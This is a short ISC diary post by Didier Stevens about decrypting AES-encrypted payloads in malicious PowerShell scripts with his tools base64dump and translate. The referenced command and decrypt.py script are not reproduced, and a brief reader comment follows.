PowerShell scripts are often used to deliver malicious payloads: shellcode, another PowerShell script, reflective DLL, … And you've probably encountered malicious scripts with an encrypted payload, for example encrypted with AES. In a video I created, I show how to decrypt a typical encrypted payload with my tools base64dump and translate. The command I use in the video is:
The content of decrypt.py I use in the video is here:
This small script uses crypto functions from pycryptodome. If you want to try for yourself, I shared the example PowerShell script on pastebin.
Didier Stevens |
DidierStevens 546 Posts ISC Handler Nov 30th 2020 |
Thread locked Subscribe |
Nov 30th 2020 4 months ago |
Nicely done, thank you.
|
Anonymous |
Quote |
Nov 30th 2020 4 months ago |
Sign Up for Free or Log In to start participating in the conversation!